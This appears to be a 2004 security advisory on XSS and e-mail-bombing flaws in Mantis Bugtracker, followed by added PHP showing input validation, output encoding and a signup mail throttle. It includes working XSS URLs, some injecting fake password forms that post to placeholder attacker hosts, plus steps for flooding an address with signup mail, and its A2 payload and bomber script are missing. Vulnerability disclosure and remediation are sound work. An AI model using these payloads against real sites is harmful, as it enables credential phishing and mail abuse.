---------------------------------------------------------------------------
Multiple vulnerabilities in Mantis Bugtracker
---------------------------------------------------------------------------

Author: Joxean Koret
Date: This year, 2004 :) between June and August
Location: Basque Country

---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mantis Bugtracker

Mantis is a web-based bugtracking system. It is written in the PHP
scripting language and requires the MySQL database and a webserver.

---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Multiple Cross Site Scripting Vulnerabilities

A1. The first vulnerability that I found is this:

You can log in anonymously and, when you want to perform a privileged
action, you need to log in again with a valid user. The previous URL is
passed as the "return" parameter to the login_page.php script. This
parameter is not correctly sanitized when it is shown/parsed, so we can put
any HTML/script code that we want into it.

To try the first vulnerability, copy the following text and paste it in the
location bar of your favourite web browser:

http:///login_page.php?return=%22%3E%3Ch1%3EHello!%3C/h1%3E%3Cform%20action=%22http://malicious.site.com/script.xxx%22%3EPlease%20type%20your%20password%20:%20%3Cinput%20type=%22password%22%20name=%22your_password%22%3E%3Cbr%3E%3Cinput%20type=%22submit%22%20value=%22Give%20me%20your%20password,%20please...%22%3E%3C/form%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr

A2. Register New User XSS Vulnerability

The second XSS problem is in the script signup.php (for example,
http://bugs.mantisbt.org/signup.php). This script registers a new user.
The problem is that the script does not properly sanitize the submitted
e-mail address when showing/parsing it. This is the second XSS problem that
I found. To test it, please follow these steps:

- Navigate to http:///signup_page.php
- In the username field type any username that you want
- In the e-mail field type this text: or

Hi!
A3. Select Project XSS Vulnerability
------------------------------------

I will not explain the problem because it is the same every time. Try the
following URL please:

http:///login_select_proj_page.php?ref=%3Cbr%3E%3Cform%20action=%22http://my.fucking.site/xxx.sss%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3EUsername:%3C/td%3E%3Ctd%3E%3Cinput%20type=text%20name=user%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput%20type=password%20name=pass%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%20colspan=2%3E%3Cinput%20type=submit%20%20value=%22login%22%20onclick=%22javascript:alert('hi')%22%3E%3C/td%3E%3C/tr%3E%3C/form%3E

A4. Another XSS Vulnerability

Try the following URL:

http:///view_all_set.php?type=1&reporter_id=5031&hide_status=80<script>alert('hi')</script>

----------------------------------------------
B. Possible E-Mail Bomber.

That's fun! We can create a simple program to send too many e-mails to the
same e-mail address by simply changing the username. For example:

1.- Navigate to http:///signup_page.php
2.- In the username field type test0
3.- In the e-mail field type test@test.com
4.- Send it.

1.- Navigate to http:///signup_page.php
2.- In the username field type test1
3.- In the e-mail field type test@test.com
4.- Send it.

If you want to try the problem you can use the following simple script:

======================================================================
mantis-email-bomber.php
======================================================================

---------------------------------------------------------------------------
The fix:
~~~~~~~~

The vendor has been contacted and all the bugs are corrected in the CVS
version at the sourceforge.net site.

---------------------------------------------------------------------------
Contact:
~~~~~~~~

Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<>>>>es
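All four XSS issues (A1 to A4) share one root cause: a request parameter is
echoed into the page without output encoding. The following PHP is an added
example for this advisory, not Mantis code and not the vendor's fix. It
shows the vulnerable pattern beside a hardened one for the "return"
parameter of A1, plus the integer cast that closes the hide_status case of
A4. The function names, the default of index.php and the constructed
payload are assumptions for illustration.

```php
<?php
// Added example (not Mantis code): vulnerable versus hardened handling of
// a reflected request parameter. Function names are assumptions.

// Vulnerable pattern: the raw parameter is pasted into an attribute value,
// so a value beginning with "> closes the attribute and injects markup.
function render_return_field_vulnerable(string $return): string
{
    return '<input type="hidden" name="return" value="' . $return . '">';
}

// Input validation: the "return" value is only ever meant to be a path on
// the same site, so anything with a scheme, a protocol-relative "//" prefix
// or control characters is replaced by a safe default.
function sanitize_return_path(string $return, string $default = 'index.php'): string
{
    if ($return === ''
        || preg_match('#^[a-z][a-z0-9+.\-]*:#i', $return)   // has a URL scheme
        || strpos($return, '//') === 0                      // protocol-relative
        || preg_match('/[\x00-\x1f\x7f]/', $return)) {      // control characters
        return $default;
    }
    return $return;
}

// Output encoding: whatever survives validation is HTML-encoded, so quotes
// and angle brackets can no longer terminate the attribute or open a tag.
function render_return_field_hardened(string $return): string
{
    $safe = htmlspecialchars(sanitize_return_path($return), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="return" value="' . $safe . '">';
}

// Numeric parameters such as hide_status (A4) never need encoding if they
// are cast to the type the script actually expects before use.
function sanitize_int_param(array $params, string $name, int $default = 0): int
{
    return isset($params[$name]) ? (int) $params[$name] : $default;
}

// Constructed payload in the style of A1 (not the advisory's exact string).
$payload = '"><h1>Hello!</h1><form action="http://malicious.site.example/">';

echo render_return_field_vulnerable($payload), "\n";  // markup breaks out of the attribute
echo render_return_field_hardened($payload), "\n";    // quotes and brackets are encoded
echo render_return_field_hardened('http://malicious.site.example/x'), "\n"; // replaced by default
echo render_return_field_hardened('view_all_bug_page.php'), "\n";         // legitimate path kept
echo sanitize_int_param(['hide_status' => "80<script>alert('hi')</script>"], 'hide_status'), "\n";
```

Run with php on the command line. The first line shows the h1 and foreign
form landing in the page; the second shows the same payload rendered as
&quot;&gt;&lt;h1&gt;... and therefore inert; the third shows an absolute
URL replaced by the default; the last prints 80 because (int) keeps only
the leading digits. The same two steps, validate on input and encode on
output, apply to the e-mail field of A2 and the ref parameter of A3.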
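The e-mail bomber in section B works because every signup with a new
username sends a message to whatever address was typed, with no limit per
address. The following PHP is an added example, not Mantis code and not the
vendor's fix: a per-address throttle in front of the mail call, exercised
by simulating the test0, test1, ... sequence from the advisory in memory.
The store layout, the limits and the timestamps are constructed for the
example.

```php
<?php
// Added example (not Mantis code): throttle signup confirmation mails per
// e-mail address. The array-backed store stands in for a database table
// with columns (email, window_start, count); its layout is an assumption.

const SIGNUP_MAX_PER_WINDOW = 3;     // mails allowed per address per window
const SIGNUP_WINDOW_SECONDS = 3600;  // length of the window in seconds

// Returns true if a confirmation mail may be sent to $email at time $now,
// and records the attempt; returns false once the address has hit the cap.
function signup_mail_allowed(array &$log, string $email, int $now): bool
{
    $key = strtolower(trim($email));   // treat case variants as one address
    if (!isset($log[$key]) || $now - $log[$key]['window_start'] >= SIGNUP_WINDOW_SECONDS) {
        $log[$key] = ['window_start' => $now, 'count' => 0];
    }
    if ($log[$key]['count'] >= SIGNUP_MAX_PER_WINDOW) {
        return false;
    }
    $log[$key]['count']++;
    return true;
}

// Simulate section B: ten signups, usernames test0..test9, one address,
// all inside a single window. Constructed timestamp (mid-2004 epoch).
$signup_log = [];
$now = 1090000000;
$sent = 0;
$refused = 0;
for ($i = 0; $i < 10; $i++) {
    $username = "test$i";
    if (signup_mail_allowed($signup_log, 'test@test.com', $now + $i)) {
        $sent++;      // the real handler would call mail() here
    } else {
        $refused++;   // log the refusal; it is a useful abuse signal
    }
}
echo "sent: $sent, refused: $refused\n";
```

Run with php on the command line: three mails go out and the remaining
seven requests are refused. In a real deployment the counter lives in the
database, the refusal is logged with the source address so repeated hits
stand out in review, and a second throttle keyed on the client IP covers
the case of an attacker rotating target addresses.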